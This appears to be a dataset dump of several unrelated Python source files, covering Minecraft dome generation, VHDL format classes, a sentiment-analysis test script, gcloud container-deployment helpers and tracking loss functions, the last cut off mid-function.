text stringlengths 957 885k |
|---|
import os
import numpy as np
import functools
from . import dpath, chunks, resolve_symbols, namespace_dir, group_blocks_into_fills, write_fill
def check_bounds(voxels):
"""gives the bounds for a list of Voxels"""
bounds = functools.reduce(
lambda bounds, voxel: (
min(bounds[0], voxel[0]), max(bounds[1], voxel[0]),
min(bounds[2], voxel[1]), max(bounds[3], voxel[1]),
min(bounds[4], voxel[2]), max(bounds[5], voxel[2]),
),
voxels, (0, 0, 0, 0, 0, 0)
)
print(bounds)
def generate(settings):
"""
Generates functions that create domes,
one for each combination of `radiuses` and `blocks_and_tags`.
"""
namespace = namespace_dir(settings)
max_commands = dpath.get(settings, '/max_commands')
print('Generating multiple points')
radiuses = dpath.get(settings, '/radiuses')
# Generate multiple points on the dome with based on the largest radius.
step = 0.5 / functools.reduce(lambda a, b: max(a, b), radiuses)
points = [
(
np.sin(azimuth) * np.cos(elevation),
np.sin(elevation),
np.cos(azimuth) * np.cos(elevation),
)
# full circle
for azimuth in np.arange(-np.pi, np.pi, step)
# from just below the ground to the apex
for elevation in np.arange(-np.pi/4, np.pi/2, step)
]
def create_dome_fills(radius):
"""
Closure on `points` that creates a list of fills for a dome with a given radius.
"""
print(f'preparing dome: {radius}')
# convert `points` to `voxels` and remove duplicates
voxels = (np.array(points) * radius).astype(np.int16)
# remove duplicates
uniqueVoxels = {(x, y, z) for x, y, z in voxels}
# group blocks into fills
print(f'grouping dome: {radius}')
blocks = []
min_x, min_y, min_z = (0, 0, 0)
max_x, max_y, max_z = (0, 0, 0)
for x, y, z in uniqueVoxels:
min_x = min(min_x, x)
min_y = min(min_y, y)
min_z = min(min_z, z)
max_x = max(max_x, x + 1)
max_y = max(max_y, y + 1)
max_z = max(max_z, z + 1)
blocks.append((x, y, z, True))
return group_blocks_into_fills(
blocks, (max_x, max_y, max_z), (min_x, min_y, min_z)
)
def write_dome_function(radius, block, tag, fills):
"""
Closure that creates a dome function from a list of fills for given radius and block.
"""
# minecraft functions can only execute MAX_COMMANDS commands,
# so we may have to split functions
for i, fills_chunk in enumerate(chunks(fills, max_commands)):
if i > 0:
tag = f'{tag}_{i}'
file_name = os.path.join(namespace, f'{radius}_{tag}.mcfunction')
print(f'writing {file_name}')
with open(file_name, 'w') as file:
for min_voxel, max_voxel, _ in fills_chunk:
write_fill(file, min_voxel, max_voxel, block)
# create a dome function for each combination of `radiuses` and `blocks_and_tags`
blocks_and_tags = [
(resolve_symbols(settings, block), tag)
for block, tag in dpath.get(settings, '/blocks_and_tags')
]
for radius in radiuses:
fills = create_dome_fills(radius)
for block, tag in blocks_and_tags:
write_dome_function(radius, block, tag, fills)
|
# -*- coding: utf-8 -*-
""" HDL description specific formats (for RTL and signals) """
###############################################################################
# This file is part of metalibm (https://github.com/kalray/metalibm)
###############################################################################
# MIT License
#
# Copyright (c) 2018 Kalray
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
###############################################################################
# created: Nov 20th, 2016
# last-modified: Mar 8th, 2018
#
# author(s): <NAME> (<EMAIL>)
# description: Declaration of Node formats for hardware designs
###############################################################################
import sollya
from .ml_formats import (
ML_Format, ML_Base_FixedPoint_Format, ML_Fixed_Format,
VirtualFormat, get_virtual_cst,
ML_StringClass, DisplayFormat,
)
from ..code_generation.code_constant import VHDL_Code, C_Code
from .ml_operations import ML_Operation
from ..utility.log_report import Log
## Helper constant: 2 as a sollya object
S2 = sollya.SollyaObject(2)
class StdLogicDirection:
class Downwards:
@staticmethod
def get_descriptor(low, high):
return "%s downto %s" % (high, low)
class Upwards:
@staticmethod
def get_descriptor(low, high):
return "%s to %s" % (low, high)
## Computes the negation of the positive @p value on
# @p size bits
# Fails if value exceeds the largest representable
# number of @p size - 1 bits
def get_2scomplement_neg(value, size):
value = int(abs(value))
assert value < (S2**(size-1) - 1)
return (~value+1)
def generic_get_vhdl_cst(value, bit_size, is_std_logic=False):
"""
:param is_std_logic: indicates whether or not fixed-point support format
is a single-bit std_logic (rather than std_logic_vector) which implies
particular value string generation
:type is_std_logic: bool
"""
try:
value = int(value)
value &= int(2**bit_size - 1)
except TypeError:
Log.report(Log.Error, "unsupported value={}/bit_size={} in generic_get_vhdl_cst".format(value, bit_size), error=TypeError)
assert bit_size > 0
assert value <= (2**bit_size - 1)
if is_std_logic:
assert bit_size == 1
if bit_size != 1:
Log.report(Log.Error, "bit_size must be 1 (not {}) for generic_get_vhdl_cst is_std_logic=True)", bit_size)
return "'%s'" % bin(value)[2:].replace("L","")
elif bit_size % 4 == 0:
return "X\"%s\"" % hex(value)[2:].replace("L","").zfill(bit_size // 4)
else:
return "\"%s\"" % bin(value)[2:].replace("L","").zfill(bit_size)
class ML_UnevaluatedFormat:
""" generic virtual class for unevaluated format.
Unevaluated format is a parameterized format whose parameters can be left
partially unevaluated during declaration """
def evaluate(self, node_value_solver):
""" function to compute final value for node parameters
returns a fully evaluated node """
raise NotImplementedError
def get_c_cst(self, cst_value):
Log.report(Log.Error, "unevaluated format can not be used for get_c_cst")
raise NotImplementedError
class UndefinedFixedPointFormat(ML_Base_FixedPoint_Format, ML_UnevaluatedFormat):
""" class for undefined fixed-point format: the corresponding
object is a fixed-point format whose integer and fractional size
have not been determined yet (they can be unevaluated expressions) """
def __init__(self, integer_size, frac_size, signed=True, support_format=None, align=0):
ML_Base_FixedPoint_Format.__init__(self, integer_size, frac_size, signed, support_format=support_format, align=align)
name = "unevaluated_fixed_point"
self.name[VHDL_Code] = name
def evaluate(self, node_value_solver):
int_size = node_value_solver(self.integer_size)
frac_size = node_value_solver(self.frac_size)
return fixed_point(int_size, frac_size, signed=self.signed, support_format=self.support_format)
def get_c_cst(self, cst_value):
return ML_UnevaluatedFormat.get_c_cst(self, cst_value)
def __str__(self):
if self.signed:
return "FS<undef>"
else:
return "FU<undef>"
class RTL_FixedPointFormat(ML_Base_FixedPoint_Format):
def __init__(self, integer_size, frac_size, signed = True, support_format = None, align = 0):
ML_Base_FixedPoint_Format.__init__(self, integer_size, frac_size, signed, support_format = support_format, align = align)
name = ("" if self.signed else "U") + "INT" + str(self.get_bit_size())
self.name[VHDL_Code] = name
def get_vhdl_cst(self, cst_value):
is_std_logic = (self.support_format == ML_StdLogic)
return generic_get_vhdl_cst(cst_value * S2**self.get_frac_size(), self.get_bit_size(), is_std_logic=is_std_logic)
def get_name(self, language = VHDL_Code):
return self.support_format.get_name(language)
def get_code_name(self, language = VHDL_Code):
return self.support_format.get_code_name(language)
def is_cst_decl_required(self):
return False
def get_cst(self, cst_value, language = VHDL_Code):
if language is VHDL_Code:
return self.get_vhdl_cst(cst_value)
else:
raise NotImplementedError
def __eq__(self, other_format):
if not isinstance(other_format, self.__class__):
return False
else:
return self.integer_size == other_format.integer_size and \
self.frac_size == other_format.frac_size and \
self.support_format == other_format.support_format and \
self.signed == other_format.signed
@staticmethod
def parse_from_match(format_match):
""" Parse the description of a class format and generates
the format object """
assert not format_match is None
name = format_match.group("name")
int_size = int(format_match.group("integer"))
frac_size = int(format_match.group("frac"))
is_signed = (name == "FS")
return fixed_point(int_size, frac_size, signed=is_signed)
def HdlVirtualFormat(base_precision):
""" Build a VirtualFormat to wrap @p base_precision """
return VirtualFormat(
base_format=base_precision,
support_format=ML_StdLogicVectorFormat(base_precision.get_bit_size()),
get_cst=get_virtual_cst
)
def RawLogicVectorFormat(bit_size, offset=0, direction=StdLogicDirection.Downwards):
""" build a low-level digital vector format """
if isinstance(bit_size, ML_Operation) or isinstance(offset, ML_Operation):
return UnevaluatedStdLogicVectorFormat(bit_size, offset, direction)
else:
return ML_StdLogicVectorFormat(bit_size, offset=offset, direction=direction)
class HDL_LowLevelFormat(ML_Format):
format_prefix = "undefined_prefix"
""" Format class for multiple bit signals """
def __init__(self, bit_size, offset=0, direction=StdLogicDirection.Downwards):
ML_Format.__init__(self)
self.bit_size = bit_size
self.name[VHDL_Code] = "{format_prefix}({direction_descriptor})".format(
format_prefix=self.format_prefix,
direction_descriptor = direction.get_descriptor(offset, offset + self.bit_size - 1))
self.direction = direction
self.offset = offset
self.display_format[VHDL_Code] = "%s"
def __str__(self):
return self.name[VHDL_Code]
def __repr__(self):
return self.name[VHDL_Code]
def get_name(self, language=VHDL_Code):
language = VHDL_Code if language is None else language
return self.name[language]
def get_code_name(self, language=VHDL_Code):
return self.get_name(language)
def get_cst(self, cst_value, language = VHDL_Code):
if language is VHDL_Code:
return self.get_vhdl_cst(cst_value)
else:
# default case
return self.get_vhdl_cst(cst_value)
def get_bit_size(self):
return self.bit_size
def get_integer_coding(self, value, language = VHDL_Code):
return int(value)
def get_vhdl_cst(self, value):
return generic_get_vhdl_cst(value, self.bit_size)
def is_cst_decl_required(self):
return False
def __eq__(self, format2):
return isinstance(format2, ML_StdLogicVectorFormat) and self.bit_size == format2.bit_size and self.offset == format2.offset
def __hash__(self):
return ML_Format.__hash__(self)
## Format class for multiple bit signals
class ML_StdLogicVectorFormat(HDL_LowLevelFormat):
""" classic std_logic_vector format """
format_prefix = "std_logic_vector"
resolved = True
def __init__(self, bit_size, offset=0, direction=StdLogicDirection.Downwards):
assert bit_size > 0
HDL_LowLevelFormat.__init__(self, int(bit_size), int(offset), direction)
class UnevaluatedStdLogicVectorFormat(HDL_LowLevelFormat, ML_UnevaluatedFormat):
""" classic std_logic_vector format """
format_prefix = "unevaluated_std_logic_vector"
resolved = False
def evaluate(self, node_value_solver):
bit_size = node_value_solver(self.bit_size)
offset = node_value_solver(self.offset)
return ML_StdLogicVectorFormat(bit_size, offset, direction=self.direction)
class HDL_NumericVectorFormat(HDL_LowLevelFormat):
pass
class HDL_UnsignedVectorFormat(HDL_NumericVectorFormat):
""" std_logic_arith unsigned format """
format_prefix = "unsigned"
class HDL_SignedVectorFormat(HDL_NumericVectorFormat):
""" std_logic_arith unsigned format """
format_prefix = "signed"
## Class of single bit value format
class ML_StdLogicClass(ML_Format):
""" class of single bit value signals """
def __init__(self):
ML_Format.__init__(self)
self.bit_size = 1
self.name[VHDL_Code] = "std_logic"
self.display_format[VHDL_Code] = "%s"
def __str__(self):
return self.name[VHDL_Code]
def get_name(self, language = VHDL_Code):
return self.name[language]
def get_cst(self, value, language = VHDL_Code):
return "'%d'" % value
def get_bit_size(self):
return self.bit_size
def get_support_format(self):
return self
def get_integer_coding(self, value, language=VHDL_Code):
return int(value)
## std_logic type singleton
ML_StdLogic = ML_StdLogicClass()
## Helper to build RTL fixed-point formats
def fixed_point(int_size, frac_size, signed = True, support_format = None):
""" Generate a fixed-point format """
support_format = support_format or ML_StdLogicVectorFormat(int_size + frac_size)
new_precision = RTL_FixedPointFormat(
int_size, frac_size,
signed = signed,
support_format = support_format
)
return new_precision
def lazy_fixed_point(int_size, frac_size, signed=True, support_format=None):
""" Generate a lazy fixed-point format with unevaluated integer and fractionnal sizes """
new_precision = UndefinedFixedPointFormat(
int_size, frac_size,
signed=signed,
support_format=support_format
)
return new_precision
## Test whether @p precision is a fixed-point format
# @return boolean value
def is_fixed_point(precision):
return isinstance(precision, ML_Base_FixedPoint_Format)
def is_unevaluated_format(precision):
return isinstance(precision, ML_UnevaluatedFormat)
def get_unsigned_precision(precision):
""" convert a sign agnostic precision (std_logic_vector)
to its unsigned counterpart (same size, same offset, same
direction """
if isinstance(precision, HDL_UnsignedVectorFormat):
return precision
elif isinstance(precision, ML_StdLogicVectorFormat):
return HDL_UnsignedVectorFormat(precision.bit_size, precision.offset, precision.direction)
else:
raise NotImplementedError
def get_signed_precision(precision):
""" convert a sign agnostic precision (std_logic_vector)
to its signed counterpart (same size, same offset, same
direction """
if isinstance(precision, HDL_SignedVectorFormat):
return precision
elif isinstance(precision, ML_StdLogicVectorFormat):
return HDL_SignedVectorFormat(precision.bit_size, precision.offset, precision.direction)
else:
raise NotImplementedError
def get_numeric_precision(precision, is_signed):
""" convert a sign agnostic precision (std_logic_vector)
to its signed/unsigned counterpart (same size, same offset, same
direction """
if is_signed:
return get_signed_precision(precision)
else:
return get_unsigned_precision(precision)
##
HDL_FILE = ML_StringClass("file", DisplayFormat("%s"), lambda self, s: "\"{}\"".format(s))
HDL_LINE = ML_StringClass("line", DisplayFormat("%s"), lambda self, s: "\"{}\"".format(s))
HDL_OPEN_FILE_STATUS = ML_StringClass("file_open_status", DisplayFormat("%s"), lambda self, s: "{}".format(s))
HDL_OPEN_FILE_STATUS.get_cst_map[VHDL_Code] = HDL_OPEN_FILE_STATUS.get_cst_map[C_Code]
|
<reponame>coldenheart/123<filename>python/contrib/SentimentAnalysis/models/test.py
"""coding=utf-8
Copyright 2020 Huawei Technologies Co., Ltd
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
============================================================================
"""
import os
import sys
import datetime
import numpy
import random
import argparse
import pickle
import tensorflow as tf
from tensorflow.python.platform import gfile
from handle_data import dataLoader, CreatVocab
# from handle_data.CreatVocab import *
from handle_data.CreatVocab import graph_util
from handle_data.batch_iter import create_batch_iter, pair_data_variable
from model.lstm import Lstm
from driver.Config import Configurable
from bert.pretrain import modeling, tokenization
def train(train_data, dev_data, vocab, config,
bert_config_):
src_vocab, tgt_vocab = vocab
print('init model')
model = None
print('start training...')
use_cuda = False
if config.use_cuda:
use_cuda = True
# saver = tf.train.Saver()
with tf.Session(config=tf.ConfigProto(
log_device_placement=use_cuda)) as sess:
if config.load_model:
a = 0
else:
sess.run(tf.global_variables_initializer())
# if config.decode:
decode(model, sess, dev_data, vocab, config,
bert_config_)
print('decode successful!')
return 0
writer = tf.summary.FileWriter("logs1/", sess.graph)
evaluate(model, -1, sess, dev_data, vocab, config)
for i in range(config.epochs):
step = 1
train_batch_iter = create_batch_iter(train_data,
config.batch_size,
shuffle=True)
for batch in train_batch_iter:
feature, target, word_list = pair_data_variable(
batch, src_vocab, tgt_vocab, config)
sess.run(model.train_op,
feed_dict={
model.w: feature,
model.gold: target
})
if step % config.test_interval == 0:
loss, acc = sess.run([model.loss_op, model.accuracy],
feed_dict={
model.w: feature,
model.gold: target
})
accuracy = acc / len(target) * 100
time_str = datetime.datetime.now().isoformat()
print('epoch:{} step:{}|{} acc={:.2f}% loss={:.5f}'.format(
i, step, time_str, accuracy, loss))
step += 1
evaluate(model, i, sess, dev_data, vocab, config)
def decode(model, sess, dev_data, vocab, config):
src_vocab, tgt_vocab = vocab
# load model
print('existed model path is : ' + config.save_dirs + '/' +
config.save_model_path)
graph_def = tf.GraphDef()
with open(config.save_dirs + '/' + config.save_model_path, 'rb') as f:
graph_def.ParseFromString(f.read())
sess.graph.as_default()
tf.import_graph_def(graph_def, name='')
sess = tf.Session()
sess.run(tf.global_variables_initializer())
_w = sess.graph.get_tensor_by_name('w:0')
# _gold = sess.graph.get_tensor_by_name('gold:0')
logits = sess.graph.get_tensor_by_name('s/logits:0')
model.dropout = 0
w = []
pre = []
print('start decode...')
train_batch_iter = create_batch_iter(dev_data,
config.batch_size,
shuffle=True)
print("config.decode_path: ", config.decode_path)
with open(config.decode_path, 'w', encoding='utf8') as f:
for batch in train_batch_iter:
feature, target, word_list = pair_data_variable(
batch, src_vocab, tgt_vocab, config)
logits = sess.run(
logits,
feed_dict={_w: feature
# _gold: target
})
print("feature: ", feature)
print("---------------------------------------------------")
print("target: ", target)
print("---------------------------------------------------")
print("logits ", logits)
print("---------------------------------------------------")
predicts = np.argmax(logits, axis=1).tolist()
print("predicts ", predicts)
for id_, index in enumerate(predicts):
pre.append(predicts[id_])
w.append(word_list[id_])
#save file
# s_input = ''
# for id, s_list in enumerate(w):
# if s_list == 0:
# continue
# for idx, l_list in enumerate(s_list):
# s_input += l_list
# f.write(s_input + ' ' + tgt_vocab.id2word(pre[id]) + '\n')
# s_input = ''
def evaluate(model, epoch, sess, dev_data, vocab, config):
src_vocab, tgt_vocab = vocab
print('start evaluate...')
total_acc = 0
gold_num = 0
model.dropout = 0
train_batch_iter = create_batch_iter(dev_data,
config.batch_size,
shuffle=True)
for batch in train_batch_iter:
feature, target, word_list = pair_data_variable(
batch, src_vocab, tgt_vocab, config)
gold_num += len(target)
loss, acc = sess.run([model.loss_op, model.accuracy],
feed_dict={
model.w: feature,
model.gold: target
})
total_acc += acc
accuracy = total_acc / gold_num * 100
_best_acc = best_acc
print('acc={:.2f}%'.format(accuracy))
if accuracy > _best_acc:
_best_acc = accuracy
_best_epoch = epoch
print('##Update! best_acc={:.2f}% in epoch {}'.format(
_best_acc, _best_epoch))
output_graph_def = graph_util.convert_variables_to_constants(
sess, sess.graph_def, output_node_names=['s/logits'])
with tf.gfile.GFile(config.save_dirs + '/' + config.save_model_path,
mode='wb') as f:
f.write(output_graph_def.SerializeToString())
print('saved model successfully! in ' + config.save_dirs + '/' +
config.save_model_path)
else:
print('not update, best_acc={:.2f}% in epoch {}'.format(
_best_acc, _best_epoch))
if __name__ == '__main__':
random.seed(233)
np.random.seed(233)
tf.set_random_seed(233)
# parameters
parse = argparse.ArgumentParser()
parse.add_argument('--config_file', type=str, default='default.ini')
parse.add_argument('--thread', type=int, default=1)
parse.add_argument('--use_cuda', action='store_true', default=False)
parse.add_argument('-bert_config_file',
type=str,
default=os.path.join('chinese_L-12_H-768_A-12',
'bert_config.json'))
parse.add_argument('-vocab_file',
type=str,
default=os.path.join('chinese_L-12_H-768_A-12',
'vocab.txt'),
help='bert_vocab')
parse.add_argument(
'-max_seq_length',
type=int,
default=202,
help=
'The maximum total input sequence length after WordPiece tokenization.'
)
parse.add_argument(
'-warmup_proportion',
type=float,
default=0.1,
help='Proportion of training to perform linear learning rate warmup for '
'E.g., 0.1 = 10% of training.')
parse.add_argument('-do_lower_case',
type=bool,
default=True,
help='Whether to lower case the input text.')
args, extra_args = parse.parse_known_args()
config_ = Configurable(args.config_file, extra_args)
bert_config = modeling.BertConfig.from_json_file(args.bert_config_file)
if args.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(args.max_seq_length, bert_config.max_position_embeddings))
tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file,
do_lower_case=args.do_lower_case)
print("this is decode --------------")
path = './data/test.txt'
dev_data_, sentence_length = dataLoader.decoder_sentence(path)
print(config_.save_dirs + '/' + config_.word_path)
with open(config_.save_dirs + '/' + config_.word_path, 'rb') as f_:
src_vocab_ = pickle.load(f_)
with open(config_.save_dirs + '/' + config_.label_path, 'rb') as f_:
tgt_vocab_ = pickle.load(f_)
best_acc = 0
best_epoch = 0
train("", dev_data_, (src_vocab_, tgt_vocab_), tgt_vocab_.size, config_,
bert_config)
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for creating GCE container (Docker) deployments."""
import json
import re
import shlex
from googlecloudsdk.api_lib.compute import file_utils
from googlecloudsdk.api_lib.compute import metadata_utils
from googlecloudsdk.calliope import exceptions
USER_INIT_TEMPLATE = """#cloud-config
runcmd:
- ['/usr/bin/kubelet',
'--allow-privileged=%s',
'--manifest-url=http://metadata.google.internal/computeMetadata/v1/instance/attributes/google-container-manifest',
'--manifest-url-header=Metadata-Flavor:Google',
'--config=/etc/kubernetes/manifests']
"""
USER_DATA_KEY = 'user-data'
CONTAINER_MANIFEST_KEY = 'google-container-manifest'
ALLOWED_PROTOCOLS = ['TCP', 'UDP']
def _GetUserInit(allow_privileged):
"""Gets user-init metadata value for GCI image."""
allow_privileged_val = 'true' if allow_privileged else 'false'
return USER_INIT_TEMPLATE % (allow_privileged_val)
def _GetContainerManifest(
name, container_manifest, docker_image, port_mappings, run_command,
run_as_privileged):
"""Loads container manifest from file or creates a new one."""
if container_manifest:
return file_utils.ReadFile(container_manifest, 'container manifest')
else:
return CreateContainerManifest(name, docker_image, port_mappings,
run_command, run_as_privileged)
class InvalidMetadataKeyException(exceptions.ToolException):
"""InvalidMetadataKeyException is for not allowed metadata keys."""
def __init__(self, metadata_key):
super(InvalidMetadataKeyException, self).__init__(
'Metadata key "{0}" is not allowed when running contenerized VM.'
.format(metadata_key))
def CreateContainerManifest(
name, docker_image, port_mappings, run_command, run_as_privileged):
"""Create container deployment manifest."""
container = {
'name': name,
'image': docker_image,
'imagePullPolicy': 'Always'
}
config = {
'apiVersion': 'v1',
'kind': 'Pod',
'metadata': {'name': name},
'spec': {'containers': [container]}
}
if port_mappings:
container['ports'] = _ValidateAndParsePortMapping(port_mappings)
if run_command:
try:
container['command'] = shlex.split(run_command)
except ValueError as e:
raise exceptions.InvalidArgumentException('--run-command', str(e))
if run_as_privileged:
container['securityContext'] = {'privileged': True}
return json.dumps(config, indent=2, sort_keys=True)
def ValidateUserMetadata(metadata):
"""Validates if user-specified metadata.
Checks if it contains values which may conflict with container deployment.
Args:
metadata: user-specified VM metadata.
Raises:
InvalidMetadataKeyException: if there is conflict with user-provided
metadata
"""
for entry in metadata.items:
if entry.key in [USER_DATA_KEY, CONTAINER_MANIFEST_KEY]:
raise InvalidMetadataKeyException(entry.key)
def CreateMetadataMessage(
messages, run_as_privileged, container_manifest, docker_image,
port_mappings, run_command, user_metadata, name):
"""Create metadata message with parameters for running Docker."""
user_init = _GetUserInit(run_as_privileged)
container_manifest = _GetContainerManifest(
name=name,
container_manifest=container_manifest,
docker_image=docker_image,
port_mappings=port_mappings,
run_command=run_command,
run_as_privileged=run_as_privileged)
docker_metadata = {}
docker_metadata[USER_DATA_KEY] = user_init
docker_metadata[CONTAINER_MANIFEST_KEY] = container_manifest
return metadata_utils.ConstructMetadataMessage(
messages,
metadata=docker_metadata,
existing_metadata=user_metadata)
def ExpandGciImageFlag():
"""Select a GCI image to run Docker."""
# TODO(user, b/29154416): get latest image in GCI major release
# Pin this version of gcloud to GCI image version
return 'projects/google-containers/global/images/gci-stable-50-7978-71-0'
def _ValidateAndParsePortMapping(port_mappings):
"""Parses and validates port mapping."""
ports_config = []
for port_mapping in port_mappings:
mapping_match = re.match(r'^(\d+):(\d+):(\S+)$', port_mapping)
if not mapping_match:
raise exceptions.InvalidArgumentException(
'--port-mappings',
'Port mappings should follow PORT:TARGET_PORT:PROTOCOL format.')
port, target_port, protocol = mapping_match.groups()
if protocol not in ALLOWED_PROTOCOLS:
raise exceptions.InvalidArgumentException(
'--port-mappings',
'Protocol should be one of [{0}]'.format(
', '.join(ALLOWED_PROTOCOLS)))
ports_config.append({
'containerPort': int(target_port),
'hostPort': int(port),
'protocol': protocol})
return ports_config
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn import Parameter
import torchvision
from models.losses import FocalLoss, TripletLoss
from models.losses import RegL1Loss, RegLoss, NormRegL1Loss, RegWeightedL1Loss
from models.decode import mot_decode
from models.utils import _sigmoid, _tranpose_and_gather_feat
from utils.post_process import ctdet_post_process
from .base_trainer import BaseTrainer
def myphi(x,m):
x = x * m
return 1-x**2/math.factorial(2)+x**4/math.factorial(4)-x**6/math.factorial(6) + \
x**8/math.factorial(8) - x**9/math.factorial(9)
class AngleLinear(nn.Module):
def __init__(self, in_features, out_features, m = 4, phiflag=True):
super(AngleLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.Tensor(in_features,out_features))
self.weight.data.uniform_(-1, 1).renorm_(2,1,1e-5).mul_(1e5)
self.phiflag = phiflag
self.m = m
self.mlambda = [
lambda x: x**0,
lambda x: x**1,
lambda x: 2*x**2-1,
lambda x: 4*x**3-3*x,
lambda x: 8*x**4-8*x**2+1,
lambda x: 16*x**5-20*x**3+5*x
]
def forward(self, input):
x = input # size=(B,F) F is feature len
w = self.weight # size=(F,Classnum) F=in_features Classnum=out_features
ww = w.renorm(2,1,1e-5).mul(1e5)
xlen = x.pow(2).sum(1).pow(0.5) # size=B
wlen = ww.pow(2).sum(0).pow(0.5) # size=Classnum
cos_theta = x.mm(ww) # size=(B,Classnum)
cos_theta = cos_theta / xlen.view(-1,1) / wlen.view(1,-1)
cos_theta = cos_theta.clamp(-1,1)
if self.phiflag:
cos_m_theta = self.mlambda[self.m](cos_theta)
theta = Variable(cos_theta.data.acos())
k = (self.m*theta/3.14159265).floor()
n_one = k*0.0 - 1
phi_theta = (n_one**k) * cos_m_theta - 2*k
else:
theta = cos_theta.acos()
phi_theta = myphi(theta,self.m)
phi_theta = phi_theta.clamp(-1*self.m,1)
cos_theta = cos_theta * xlen.view(-1,1)
phi_theta = phi_theta * xlen.view(-1,1)
output = (cos_theta,phi_theta)
return output # size=(B,Classnum,2)
class AngleLoss(nn.Module):
def __init__(self, gamma=0):
super(AngleLoss, self).__init__()
self.gamma = gamma
self.it = 0
self.LambdaMin = 5.0
self.LambdaMax = 1500.0
self.lamb = 1500.0
def forward(self, input, target):
self.it += 1
cos_theta,phi_theta = input
target = target.view(-1,1) #size=(B,1)
index = cos_theta.data * 0.0 #size=(B,Classnum)
idx = index.scatter(1,target.data.view(-1,1),1)
idx = idx.bool()
idx = Variable(idx)
#print(index)
self.lamb = max(self.LambdaMin,self.LambdaMax/(1+0.1*self.it ))
output = cos_theta*1.0 #size=(B,Classnum)
#out = output
#print(output)
output[idx] = cos_theta[idx] - cos_theta[idx]*(1.0+0)/(1+self.lamb) + phi_theta[idx]*(1.0+0)/(1+self.lamb)
#print(output)
#output[idx] += phi_theta[idx]*(1.0+0)/(1+self.lamb)
#print(output)
#output[index] = output[index] - output[index]*(1.0+0)/(1+self.lamb) + phi_theta[index]*(1.0+0)/(1+self.lamb)
logpt = F.log_softmax(output)
logpt = logpt.gather(1,target)
logpt = logpt.view(-1)
pt = Variable(logpt.data.exp())
loss = -1 * (1-pt)**self.gamma * logpt
#print(loss)
loss = loss.mean()
#print(loss)
return loss
class MotLoss(torch.nn.Module):
def __init__(self, opt):
super(MotLoss, self).__init__()
self.crit = torch.nn.MSELoss() if opt.mse_loss else FocalLoss()
self.crit_reg = RegL1Loss() if opt.reg_loss == 'l1' else \
RegLoss() if opt.reg_loss == 'sl1' else None
self.crit_wh = torch.nn.L1Loss(reduction='sum') if opt.dense_wh else \
NormRegL1Loss() if opt.norm_wh else \
RegWeightedL1Loss() if opt.cat_spec_wh else self.crit_reg
self.opt = opt
self.emb_dim = opt.reid_dim
self.nID = opt.nID
self.classifier = nn.Linear(self.emb_dim, self.nID)
#self.classifier = AngleLinear(self.emb_dim,self.nID)
self.IDLoss = nn.CrossEntropyLoss(ignore_index=-1)
#self.IDLoss = AngleLoss()
#self.TriLoss = TripletLoss()
self.emb_scale = math.sqrt(2) * math.log(self.nID - 1)
self.s_det = nn.Parameter(-1.85 * torch.ones(1))
self.s_id = nn.Parameter(-1.05 * torch.ones(1))
def forward(self, outputs, batch):
opt = self.opt
hm_loss, wh_loss, off_loss, id_loss = 0, 0, 0, 0
for s in range(opt.num_stacks):
output = outputs[s]
if not opt.mse_loss:
output['hm'] = _sigmoid(output['hm'])
hm_loss += self.crit(output['hm'], batch['hm']) / opt.num_stacks
if opt.wh_weight > 0:
wh_loss += self.crit_reg(
output['wh'], batch['reg_mask'],
batch['ind'], batch['wh']) / opt.num_stacks
if opt.reg_offset and opt.off_weight > 0:
off_loss += self.crit_reg(output['reg'], batch['reg_mask'],
batch['ind'], batch['reg']) / opt.num_stacks
'''if opt.id_weight > 0:
#id_head = _tranpose_and_gather_feat(output['id'], batch['ind'])
id_head = output['id_feature']
index = output['index']
reg_mask = batch['reg_mask'].view(-1)[index]
gt_id = batch['ids'].view(-1)[index]
#print(id_head.size())
id_head = id_head[reg_mask> 0].contiguous()
#print(id_head.size())
id_head = self.emb_scale * F.normalize(id_head)
#id_head_t = id_head.transpose(1,0)
#length = id_head * id_head_t
id_target = gt_id[reg_mask > 0]
#print(id_target.size(),id_target)
id_output = self.classifier(id_head)
id_loss += self.IDLoss(id_output, id_target)'''
if opt.id_weight > 0:
# id_head = _tranpose_and_gather_feat(output['id'], batch['ind'])
id_head = output['id_feature']
# print(id_head.size())
id_head = id_head[batch['reg_mask'] > 0].contiguous()
# print(id_head.size())
id_head = self.emb_scale * F.normalize(id_head)
# id_head_t = id_head.transpose(1,0)
# length = id_head * id_head_t
id_target = batch['ids'][batch['reg_mask'] > 0]
# print(id_target.size(),id_target)
